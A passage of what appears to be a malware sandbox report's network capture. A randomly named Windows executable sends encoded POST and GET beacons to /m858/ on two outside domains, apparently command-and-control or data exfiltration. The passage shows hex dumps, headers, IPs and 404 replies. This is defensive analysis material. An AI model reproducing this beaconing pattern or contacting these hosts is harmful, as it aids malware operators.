                                                                                                                      Dec 7, 2023 15:55:47.871772051 CET1220INData Raw: 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 3b 0a 09 09 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 3b 0a 09 09 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 7d 0a 0a 09 23 73 61 6c 65 5f 64 69 61 67 6f
                                                                                                                      Data Ascii: nsform: rotate(45deg);transform: rotate(45deg);color: #fff;}#sale_diagonal_orange span:first-child {padding-top: 5px;}#break {display: block;}}</style> <style media="screen">.asset_star0 {background: url('//d38ps
                                                                                                                      Dec 7, 2023 15:55:47.915530920 CET1220INData Raw: 3b 0a 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73
                                                                                                                      Data Ascii: ; box-sizing: content-box;}body { text-align: center; font-family: sans-serif; background: #101c36; color: #626574;}.bgHolder { background:#101c36; background-image: url('//d38psrni17bvxu.cloudfront.net/themes/MobileCl
                                                                                                                      Dec 7, 2023 15:55:48.031882048 CET1220INData Raw: 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 2e 35 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 2e 35 65 6d 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 2e 31 32 35 65 6d 3b 20 67 72 69
                                                                                                                      Data Ascii: <div style="padding-bottom: .5em; padding-top: .5em; border-radius: .125em; grid-template-columns: 1fr 1fr 1fr; display: inline-grid"> <div style="grid-column: 1 / span 1; grid-row-start: 1; grid-row-end: span 2; justify-self: start; al
                                                                                                                      Dec 7, 2023 15:55:48.032021046 CET1220INData Raw: 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 39 36 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e
                                                                                                                      Data Ascii: width: 900px; max-width:96%; margin: 0 auto; z-index: 20; } .sale_link a { text-decoration: underline; color: rgb(0,0,0); font-size: 14px; } .sale_link a:hover {
                                                                                                                      Dec 7, 2023 15:55:48.032059908 CET1220INData Raw: 2f 20 52 65 71 75 69 72 65 64 20 61 6e 64 20 73 74 65 61 64 79 0a 20 20 20 20 20 20 20 20 27 63 6f 6e 74 61 69 6e 65 72 27 3a 20 27 74 63 27 2c 0a 20 20 20 20 20 20 20 20 27 74 79 70 65 27 3a 20 27 72 65 6c 61 74 65 64 73 65 61 72 63 68 27 2c 0a
                                                                                                                      Data Ascii: / Required and steady 'container': 'tc', 'type': 'relatedsearch', 'colorBackground': 'transparent', 'number': 3, // Font-Sizes and Line-Heights 'fontSizeAttribution': 14,
                                                                                                                      Dec 7, 2023 15:55:48.032099009 CET1220INData Raw: 20 20 20 20 76 61 72 20 61 64 74 65 73 74 3d 27 6f 66 66 27 3b 20 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 69 66 28 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 21 3d 3d 6c 6f
                                                                                                                      Data Ascii: var adtest='off'; </script><script type="text/javascript">if(top.location!==location) { top.location.href=location.protocol + '//' + location.host + location.pathname + (location.search ? location.search + '&' : '?') + '_xafvr=ZjA0ZGYzYWJh


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      45192.168.2.1149756144.217.103.3802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:56:01.888638020 CET698OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.hmoatl.com
                                                                                                                      Origin: http://www.hmoatl.com
                                                                                                                      Referer: http://www.hmoatl.com/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 69 57 39 67 47 33 51 41 75 61 56 48 49 73 63 38 63 6f 73 73 62 73 58 35 43 68 32 72 63 78 71 58 7a 61 6c 6e 41 4e 35 46 2b 52 72 72 38 38 35 75 74 6b 32 6d 64 33 58 68 43 58 52 32 6a 61 32 43 77 67 45 2f 54 62 73 33 43 63 71 75 65 4e 58 53 6c 33 4d 69 42 46 45 42 6e 35 53 62 52 6c 78 4b 6e 65 45 30 4b 63 65 69 32 4f 45 7a 6d 68 41 62 62 50 76 34 50 68 4b 37 4f 66 4d 6f 33 4d 59 79 72 43 63 6c 38 61 77 30 58 32 79 33 72 73 76 43 30 53 71 65 58 52 2b 59 4d 65 33 41 77 50 77 44 62 68 68 52 41 4f 37 6d 35 6f 7a 32 69 63 31 37 46 77 3d 3d
                                                                                                                      Data Ascii: yRV=iW9gG3QAuaVHIsc8cossbsX5Ch2rcxqXzalnAN5F+Rrr885utk2md3XhCXR2ja2CwgE/Tbs3CcqueNXSl3MiBFEBn5SbRlxKneE0Kcei2OEzmhAbbPv4PhK7OfMo3MYyrCcl8aw0X2y3rsvC0SqeXR+YMe3AwPwDbhhRAO7m5oz2ic17Fw==
                                                                                                                      Dec 7, 2023 15:56:02.235359907 CET479INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:56:00 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      46192.168.2.1149757144.217.103.3802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:56:04.588737011 CET718OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.hmoatl.com
                                                                                                                      Origin: http://www.hmoatl.com
                                                                                                                      Referer: http://www.hmoatl.com/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 69 57 39 67 47 33 51 41 75 61 56 48 4b 4d 73 38 50 5a 73 73 58 63 58 36 4a 42 32 72 53 52 71 62 7a 61 70 6e 41 4f 31 56 2f 6a 50 72 2f 59 78 75 75 6d 4f 6d 59 33 58 68 4b 33 51 2b 2b 71 32 4a 77 68 34 42 54 61 38 33 43 63 75 75 65 50 2f 53 6c 45 6b 68 41 56 45 48 75 5a 53 5a 50 56 78 4b 6e 65 45 30 4b 63 62 4e 32 4f 4d 7a 6e 52 77 62 62 75 76 37 4d 68 4b 34 4a 66 4d 6f 38 73 59 32 72 43 63 4c 38 66 56 6a 58 30 4b 33 72 75 33 43 30 47 32 66 5a 68 2b 61 52 75 32 43 2f 4e 35 70 55 68 78 41 5a 74 50 54 74 50 75 37 75 70 5a 6f 43 48 53 7a 52 2b 65 48 2f 37 71 6c 4b 4e 54 6b 4e 74 76 54 67 51 6b 3d
                                                                                                                      Data Ascii: yRV=iW9gG3QAuaVHKMs8PZssXcX6JB2rSRqbzapnAO1V/jPr/YxuumOmY3XhK3Q++q2Jwh4BTa83CcuueP/SlEkhAVEHuZSZPVxKneE0KcbN2OMznRwbbuv7MhK4JfMo8sY2rCcL8fVjX0K3ru3C0G2fZh+aRu2C/N5pUhxAZtPTtPu7upZoCHSzR+eH/7qlKNTkNtvTgQk=
                                                                                                                      Dec 7, 2023 15:56:04.766851902 CET479INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:56:03 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      47192.168.2.1149758144.217.103.3802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:56:07.635206938 CET1731OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.hmoatl.com
                                                                                                                      Origin: http://www.hmoatl.com
                                                                                                                      Referer: http://www.hmoatl.com/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 69 57 39 67 47 33 51 41 75 61 56 48 4b 4d 73 38 50 5a 73 73 58 63 58 36 4a 42 32 72 53 52 71 62 7a 61 70 6e 41 4f 31 56 2f 6a 48 72 38 71 70 75 74 42 61 6d 62 33 58 68 4c 33 51 39 2b 71 32 75 77 67 51 64 54 61 77 4e 43 65 6d 75 4d 63 48 53 6a 31 6b 68 4a 56 45 48 6a 35 53 55 52 6c 78 6c 6e 65 55 77 4b 63 72 4e 32 4f 4d 7a 6e 53 6f 62 5a 2f 76 37 4b 68 4b 37 4f 66 4d 73 33 4d 59 65 72 43 30 39 38 65 55 65 51 45 71 33 72 4f 6e 43 79 31 65 66 62 42 2b 63 51 75 32 67 2f 4e 6c 79 55 68 63 73 5a 74 4c 74 74 49 4b 37 69 75 55 38 42 6c 6e 6b 4d 65 53 6c 6c 4e 79 41 4c 75 75 50 4a 4e 76 49 33 56 6e 6c 4e 71 50 79 37 76 31 71 66 66 51 52 79 58 6b 41 73 4e 56 7a 77 44 67 77 68 58 57 35 38 65 47 54 35 49 48 43 70 30 6a 49 54 57 57 4c 41 70 41 6f 4e 51 66 6b 54 71 4d 6c 7a 70 6a 48 36 6c 62 68 62 77 39 55 31 4a 59 34 76 6a 73 34 33 67 41 34 6e 65 38 79 7a 77 68 56 54 38 65 69 76 49 43 6f 6b 33 72 4d 53 6f 46 78 51 46 45 78 39 4a 54 4a 6d 31 62 7a 4b 32 72 35 4a 76 77 68 73 67 4a 52 6e 48 42 38 62 61 36 30 46 48 66 6d 68 4d 74 78 75 79 4e 31 6a 64 34 59 32 52 30 54 62 78 56 57 73 2b 71 6f 65 55 55 79 50 44 66 6b 43 75 66 46 43 49 63 68 4b 32 70 6e 75 34 50 71 58 4f 75 62 39 51 63 32 47 75 49 67 46 6b 6d 59 34 34 6a 61 6f 71 74 6c 61 4d 77 59 38 67 49 33 69 64 2b 62 49 58 47 45 75 34 6f 46 32 44 6a 58 49 59 62 33 68 33 4c 65 45 2b 6c 43 65 72 61 59 69 35 39 47 30 42 6a 78 44 35 64 55 79 73 62 4c 56 6e 69 6a 62 7a 66 46 79 50 76 70 78 59 43 78 48 6e 6c 77 63 35 4f 32 4c 36 37 47 65 35 2b 2b 53 67 74 31 56 69 41 41 6d 53 46 6c 57 6e 6f 50 7a 5a 32 7a 33 68 6c 52 51 65 67 5a 4f 79 6f 69 53 51 2f 50 57 46 31 38 31 2b 32 77 31 48 55 6f 63 4a 66 4b 56 52 52 38 70 6f 57 6e 6b 69 35 57 4e 6e 6c 66 45 79 4c 36 6a 42 74 49 37 63 68 36 4f 70 50 6e 44 52 74 78 4d 48 6d 72 65 42 74 48 62 73 68 39 41 6a 50 75 34 6a 70 46 52 76 30 41 41 63 2f 2b 46 47 2b 50 43 53 74 6b 4e 59 75 49 77 71 6d 78 50 36 50 46 38 51 58 78 61 6e 2f 74 5a 61 4a 69 69 6c 2b 42 57 6f 71 2f 75 68 37 6f 4b 46 61 59 79 68 4b 4d 46 51 50 4e 79 5a 54 31 34 70 53 44 6d 2b 72 52 6d 67 62 6e 7a 6c 31 69 6a 4e 6b 57 5a 34 7a 6b 75 79 68 57 55 42 71 44 70 67 78 72 34 4a 45 38 77 5a 78 50 4f 4c 44 41 6d 75 55 45 54 5a 49 39 43 31 69 7a 4a 76 77 75 62 55 47 7a 58 46 45 78 78 34 2b 53 5a 55 5a 46 74 66 45 45 45 31 37 61 6a 4a 50 68 54 6a 39 73 47 78 33 46 30 76 44 6c 4a 42 45 59 63 71 7a 4f 42 4d 79 75 39 6a 41 41 69 6d 41 4d 67 39 4f 41 6c 51 48 70 44 6e 57 71 31 48 6f 64 35 77 45 4c 69 6c 56 36 38 43 6e 65 32 52 79 4f 6e 78 66 52 75 68 6a 47 37 45 6a 5a 38 55 31 6a 36 53 2b 4e 6f 66 4b 31 71 41 43 31 49 35 5a 74 64 38 51 70 45 66 56 6a 61 6d 54 45 4c 6b 49 57 31 56 36 74 77 51 35 76 58 53 6a 2f 62 52 63 4e 67 42 4e 6f 72 68 43 56 61 39 46 43 49 30 78 57 56 6b 67 42 4b 34 68 38 74 37 78 50 76 51 63 57 49 65 68 64 42 58 33 61 48 71 2f 53 2b 4b 61 47 57 72 76 6d 6b 75 74 66 31 39 7a 52 67 52 72 7a 37 56 6f 69 42 47 75 72 74 63 4a 54 46 30 39 4f 4b 4d 4e 37 36 34 33 49 6c 30 67 43 47 31 66 4a 45 47 38 78 44 63 57 4d 33 54 67 32 70 67 5a 79 39 49 72 31 44 65 33 66 4a 62 6b 73 71 64 57 50 2f 7a 6a 30 75 50 6a 6c 54 38 6c 67 4c 50 74 38 30 44 47 68 72 61 55 57 2f 4b 72 4b 6f 47 37 66 38 6c 72 51 31 6f 37 4e 43 7a 53 4e 59 44 47 4b 50 56 2b 68 50 72 58 37 33 53 58 6e 35 47 66 6c 61 61 66 6a 6f 6d 72 61 58 30 32 78 75 39 49 52 35 62 79 6f 33 73 6b 75 62 73 54 62 44 56 45 54 57 76 4f 37 6a 6a 30 42 55 76 52 54 75 59 34 65 4b 2b 48 61 2f 43 68 74 2b 64 64 7a 32 6a 53 61 7a 39 38 46 62 79 4b 46 37 78 7a 73 6b 71 6b 64 35 70 65 32 47 6f 73 6a 34 39 46 75 6c 4c 51 38 76 39 74 6c 69 4c 49 39 69 71 47 4b 66 38 78 66 48 31 2f 6b 56 56 75 70 4b 52 5a 61
                                                                                                                      Data Ascii: yRV=iW9gG3QAuaVHKMs8PZssXcX6JB2rSRqbzapnAO1V/jHr8qputBamb3XhL3Q9+q2uwgQdTawNCemuMcHSj1khJVEHj5SURlxlneUwKcrN2OMznSobZ/v7KhK7OfMs3MYerC098eUeQEq3rOnCy1efbB+cQu2g/NlyUhcsZtLttIK7iuU8BlnkMeSllNyALuuPJNvI3VnlNqPy7v1qffQRyXkAsNVzwDgwhXW58eGT5IHCp0jITWWLApAoNQfkTqMlzpjH6lbhbw9U1JY4vjs43gA4ne8yzwhVT8eivICok3rMSoFxQFEx9JTJm1bzK2r5JvwhsgJRnHB8ba60FHfmhMtxuyN1jd4Y2R0TbxVWs+qoeUUyPDfkCufFCIchK2pnu4PqXOub9Qc2GuIgFkmY44jaoqtlaMwY8gI3id+bIXGEu4oF2DjXIYb3h3LeE+lCeraYi59G0BjxD5dUysbLVnijbzfFyPvpxYCxHnlwc5O2L67Ge5++Sgt1ViAAmSFlWnoPzZ2z3hlRQegZOyoiSQ/PWF181+2w1HUocJfKVRR8poWnki5WNnlfEyL6jBtI7ch6OpPnDRtxMHmreBtHbsh9AjPu4jpFRv0AAc/+FG+PCStkNYuIwqmxP6PF8QXxan/tZaJiil+BWoq/uh7oKFaYyhKMFQPNyZT14pSDm+rRmgbnzl1ijNkWZ4zkuyhWUBqDpgxr4JE8wZxPOLDAmuUETZI9C1izJvwubUGzXFExx4+SZUZFtfEEE17ajJPhTj9sGx3F0vDlJBEYcqzOBMyu9jAAimAMg9OAlQHpDnWq1Hod5wELilV68Cne2RyOnxfRuhjG7EjZ8U1j6S+NofK1qAC1I5Ztd8QpEfVjamTELkIW1V6twQ5vXSj/bRcNgBNorhCVa9FCI0xWVkgBK4h8t7xPvQcWIehdBX3aHq/S+KaGWrvmkutf19zRgRrz7VoiBGurtcJTF09OKMN7643Il0gCG1fJEG8xDcWM3Tg2pgZy9Ir1De3fJbksqdWP/zj0uPjlT8lgLPt80DGhraUW/KrKoG7f8lrQ1o7NCzSNYDGKPV+hPrX73SXn5GflaafjomraX02xu9IR5byo3skubsTbDVETWvO7jj0BUvRTuY4eK+Ha/Cht+ddz2jSaz98FbyKF7xzskqkd5pe2Gosj49FulLQ8v9tliLI9iqGKf8xfH1/kVVupKRZa
                                                                                                                      Dec 7, 2023 15:56:07.817433119 CET479INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:56:06 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      48192.168.2.1149759144.217.103.3802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:56:10.322566032 CET437OUTGET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=vUVAFHoFovduHd4/DKwXed3af3ePb0vry6dcW+l5/zrb0ZZNrBa0Shr1AhFt6JSAxzoXU5EndMSNZsLwoEVPBH0RooK5H1Vl7g== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.hmoatl.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:56:10.500169992 CET479INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:56:09 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      49192.168.2.1149760103.120.80.111802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:56:17.762079000 CET698OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.633922.com
                                                                                                                      Origin: http://www.633922.com
                                                                                                                      Referer: http://www.633922.com/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 52 71 73 46 72 74 58 71 57 49 63 55 37 4a 71 39 38 38 72 2b 50 51 53 46 46 48 6b 7a 2b 64 48 41 49 55 39 69 6e 74 59 62 58 42 2f 59 51 49 69 78 42 49 53 6e 4d 74 4e 5a 37 2f 38 59 71 47 52 75 74 35 6e 51 47 4e 2b 51 2f 78 46 43 34 53 45 4f 44 44 66 41 57 6a 71 6f 67 39 6d 6d 77 69 66 54 54 55 63 6d 66 49 55 6d 69 38 64 51 77 36 48 7a 32 5a 6b 43 79 31 54 62 74 56 31 4c 4d 61 50 51 33 64 72 6e 5a 52 42 5a 72 54 5a 65 48 30 45 30 72 33 56 4f 32 49 33 37 50 64 6a 51 43 47 37 4b 75 62 78 36 35 35 4a 44 45 4b 48 51 65 59 73 71 74 51 3d 3d
                                                                                                                      Data Ascii: yRV=RqsFrtXqWIcU7Jq988r+PQSFFHkz+dHAIU9intYbXB/YQIixBISnMtNZ7/8YqGRut5nQGN+Q/xFC4SEODDfAWjqog9mmwifTTUcmfIUmi8dQw6Hz2ZkCy1TbtV1LMaPQ3drnZRBZrTZeH0E0r3VO2I37PdjQCG7Kubx655JDEKHQeYsqtQ==


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
